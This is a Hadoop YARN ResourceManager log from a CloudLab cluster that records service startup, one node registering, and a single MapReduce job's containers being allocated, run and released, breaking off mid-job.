2019-09-23 16:59:49,469 INFO org.apache.hadoop.http.HttpServer2: Added global filter 'safety' (class=org.apache.hadoop.http.HttpServer2$QuotingInputFilter)
2019-09-23 16:59:49,474 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context cluster
2019-09-23 16:59:49,474 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context static
2019-09-23 16:59:49,474 INFO org.apache.hadoop.http.HttpServer2: Added filter RMAuthenticationFilter (class=org.apache.hadoop.yarn.server.security.http.RMAuthenticationFilter) to context logs
2019-09-23 16:59:49,475 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context cluster
2019-09-23 16:59:49,475 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context static
2019-09-23 16:59:49,475 INFO org.apache.hadoop.http.HttpServer2: Added filter static_user_filter (class=org.apache.hadoop.http.lib.StaticUserWebFilter$StaticUserFilter) to context logs
2019-09-23 16:59:49,481 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /cluster/*
2019-09-23 16:59:49,481 INFO org.apache.hadoop.http.HttpServer2: adding path spec: /ws/*
2019-09-23 16:59:49,824 INFO org.apache.hadoop.yarn.webapp.WebApps: Registered webapp guice modules
2019-09-23 16:59:49,826 INFO org.apache.hadoop.http.HttpServer2: Jetty bound to port 8088
2019-09-23 16:59:49,826 INFO org.mortbay.log: jetty-6.1.26
2019-09-23 16:59:49,901 INFO org.mortbay.log: Extract jar:file:/users/F19_TIP/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.7.2.jar!/webapps/cluster to /tmp/Jetty_ms0833_utah_cloudlab_us_8088_cluster____u3cdjd/webapp
2019-09-23 16:59:50,123 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:59:50,123 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 16:59:50,124 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 16:59:51,105 INFO org.mortbay.log: Started HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 16:59:51,105 INFO org.apache.hadoop.yarn.webapp.WebApps: Web app cluster started at 8088
2019-09-23 16:59:51,140 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 16:59:51,141 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8033
2019-09-23 16:59:51,143 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceManagerAdministrationProtocolPB to the server
2019-09-23 16:59:51,143 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 16:59:51,143 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8033: starting
2019-09-23 16:59:52,012 INFO org.apache.hadoop.yarn.util.RackResolver: Resolved cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us to /default-rack
2019-09-23 16:59:52,018 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceTrackerService: NodeManager from node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us(cmPort: 42207 httpPort: 8042) registered with capability: <memory:65536, vCores:32>, assigned nodeId cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207
2019-09-23 16:59:52,021 INFO org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 Node Transitioned from NEW to RUNNING
2019-09-23 16:59:52,026 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 cluster capacity: <memory:65536, vCores:32>
2019-09-23 17:07:56,438 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 1
2019-09-23 17:07:57,887 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 1 submitted by user F19_TIP
2019-09-23 17:07:57,888 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569279589137_0001
2019-09-23 17:07:57,889 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.96	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569279589137_0001
2019-09-23 17:07:57,900 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from NEW to NEW_SAVING
2019-09-23 17:07:57,901 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569279589137_0001
2019-09-23 17:07:57,902 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from NEW_SAVING to SUBMITTED
2019-09-23 17:07:57,912 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569279589137_0001 from user: F19_TIP, in queue: default, currently num of applications: 1
2019-09-23 17:07:57,938 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from SUBMITTED to ACCEPTED
2019-09-23 17:07:57,963 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569279589137_0001_000001
2019-09-23 17:07:57,964 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from NEW to SUBMITTED
2019-09-23 17:07:57,985 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569279589137_0001_000001 to scheduler from user: F19_TIP
2019-09-23 17:07:57,990 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 17:07:59,334 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:07:59,335 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000001
2019-09-23 17:07:59,335 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available after allocation
2019-09-23 17:07:59,353 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0001_01_000001
2019-09-23 17:07:59,371 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:07:59,372 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569279589137_0001_000001
2019-09-23 17:07:59,380 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569279589137_0001 AttemptId: appattempt_1569279589137_0001_000001 MasterContainer: Container: [ContainerId: container_1569279589137_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ]
2019-09-23 17:07:59,407 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 17:07:59,409 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 17:07:59,416 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569279589137_0001_000001
2019-09-23 17:07:59,451 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569279589137_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0001_000001
2019-09-23 17:07:59,451 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569279589137_0001_01_000001 : $JAVA_HOME/bin/java -Djava.io.tmpdir=$PWD/tmp -Dlog4j.configuration=container-log4j.properties -Dyarn.app.container.log.dir=<LOG_DIR> -Dyarn.app.container.log.filesize=0 -Dhadoop.root.logger=INFO,CLA -Dhadoop.root.logfile=syslog  -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr 
2019-09-23 17:07:59,454 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569279589137_0001_000001
2019-09-23 17:07:59,458 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569279589137_0001_000001
2019-09-23 17:07:59,807 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569279589137_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:42207 }, ] for AM appattempt_1569279589137_0001_000001
2019-09-23 17:07:59,807 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 17:08:00,337 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:04,627 INFO SecurityLogger.org.apache.hadoop.ipc.Server: Auth successful for appattempt_1569279589137_0001_000001 (auth:SIMPLE)
2019-09-23 17:08:04,640 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: AM registration appattempt_1569279589137_0001_000001
2019-09-23 17:08:04,641 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=Register App Master	TARGET=ApplicationMasterService	RESULT=SUCCESS	APPID=application_1569279589137_0001	APPATTEMPTID=appattempt_1569279589137_0001_000001
2019-09-23 17:08:04,641 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569279589137_0001_000001 State change from LAUNCHED to RUNNING
2019-09-23 17:08:04,641 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569279589137_0001 State change from ACCEPTED to RUNNING
2019-09-23 17:08:06,348 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000002 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:06,348 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000002
2019-09-23 17:08:06,349 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available after allocation
2019-09-23 17:08:06,740 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0001_01_000002
2019-09-23 17:08:06,742 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000002 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:07,351 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000002 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:07,352 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000003 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:07,352 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000003
2019-09-23 17:08:07,352 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available after allocation
2019-09-23 17:08:07,770 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000003 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:08,354 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000003 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:08,355 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000004 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:08,355 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000004
2019-09-23 17:08:08,355 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available after allocation
2019-09-23 17:08:08,780 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000004 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:09,356 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000004 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:09,356 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000005 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:09,356 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000005
2019-09-23 17:08:09,357 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 17:08:09,410 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000006 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:09,410 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000006
2019-09-23 17:08:09,410 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:08:09,792 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000005 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:09,794 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000006 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:10,413 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000005 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:10,414 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000006 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:10,415 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000002 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:10,415 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000002 in state: COMPLETED event:FINISHED
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000002
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000002 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000007 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000007
2019-09-23 17:08:10,416 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:08:10,534 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000008 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:10,535 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000008
2019-09-23 17:08:10,535 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:08:10,804 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000007 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:10,813 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000008 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:11,537 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000007 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:11,537 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000008 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:11,538 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000003 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:11,538 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000003 in state: COMPLETED event:FINISHED
2019-09-23 17:08:11,538 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000003
2019-09-23 17:08:11,538 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:08:11,538 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000003 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:08:11,539 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000009 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:11,539 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000009
2019-09-23 17:08:11,539 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:08:11,820 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000010 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:11,820 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000010
2019-09-23 17:08:11,820 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 17:08:11,828 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000009 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:11,831 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000010 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:12,823 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000009 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:08:12,824 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000004 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:08:12,824 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000004 in state: COMPLETED event:FINISHED
2019-09-23 17:08:12,824 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000004
2019-09-23 17:08:12,824 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 17:08:12,824 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000004 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 17:08:12,825 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000011 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:08:12,825 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000011
2019-09-23 17:08:12,825 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0001_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 17:08:12,839 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000010 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 17:08:12,840 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0001_01_000010 in state: RELEASED event:RELEASED
2019-09-23 17:08:12,841 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0001	CONTAINERID=container_1569279589137_0001_01_000010
2019-09-23 17:08:12,841 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0001_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 17:08:12,842 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0001_000001 released container container_1569279589137_0001_01_000010 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: RELEASED
2019-09-23 17:08:12,842 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569279589137_0001
2019-09-23 17:08:12,844 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000011 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:08:13,100 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0001_01_000005 Container Transitioned from RUNNING to COMPLETED
